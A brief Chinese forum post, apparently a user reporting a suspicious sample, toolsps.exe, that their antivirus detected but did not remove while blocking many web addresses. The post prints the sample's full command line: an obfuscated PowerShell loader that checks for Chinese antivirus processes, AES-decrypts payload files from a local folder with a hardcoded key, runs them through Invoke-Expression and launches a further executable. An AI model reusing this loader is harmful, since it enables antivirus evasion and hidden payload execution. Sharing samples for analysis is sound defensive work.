BEST 过右键,双击后检测到toolsps.exe但不杀,期间疯狂拦截网址。我还要云台终止。(附toolsps.exe命令行- "C:\escsvc\toolsps.exe" if (Get-Process -Name '360Tray','360sd','HipsDaemon','kxetray','QQPCTray','RavMonD','KVMonXP' -ErrorAction SilentlyContinue) { $AES=New-Object System.Security.Cryptography.AesManaged;$AES.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AES.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AES.KeySize=256;$AES.BlockSize=128;$Salt=[System.Text.Encoding]::UTF8.GetBytes('Salt1234567890123');$DerivedBytes=New-Object System.Security.Cryptography.Rfc2898DeriveBytes('AdminAAA...',$Salt,1000);$AES.Key=$DerivedBytes.GetBytes(32);$AES.IV=$DerivedBytes.GetBytes(16);$Decryptor=$AES.CreateDecryptor();$EncryptedBytes=[Convert]::FromBase64String((Get-Content -Path 'c:\\escsvc\\4.txt' -Raw -Encoding UTF8));$DecryptedBytes=$Decryptor.TransformFinalBlock($EncryptedBytes,0,$EncryptedBytes.Length);$DecryptedContent=[System.Text.Encoding]::UTF8.GetString($DecryptedBytes);Invoke-Expression $DecryptedContent } else { Start-Process 'c:\\escsvc\\5.exe';$AES=New-Object System.Security.Cryptography.AesManaged;$AES.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AES.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AES.KeySize=256;$AES.BlockSize=128;$Salt=[System.Text.Encoding]::UTF8.GetBytes('Salt1234567890123');$DerivedBytes=New-Object System.Security.Cryptography.Rfc2898DeriveBytes('AdminAAA...',$Salt,1000);$AES.Key=$DerivedBytes.GetBytes(32);$AES.IV=$DerivedBytes.GetBytes(16);$Decryptor=$AES.CreateDecryptor();$EncryptedBytes=[Convert]::FromBase64String((Get-Content -Path 'c:\\escsvc\\3.txt' -Raw -Encoding UTF8));$DecryptedBytes=$Decryptor.TransformFinalBlock($EncryptedBytes,0,$EncryptedBytes.Length);$DecryptedContent=[System.Text.Encoding]::UTF8.GetString($DecryptedBytes);Invoke-Expression $DecryptedContent }
|
发表于 
楼主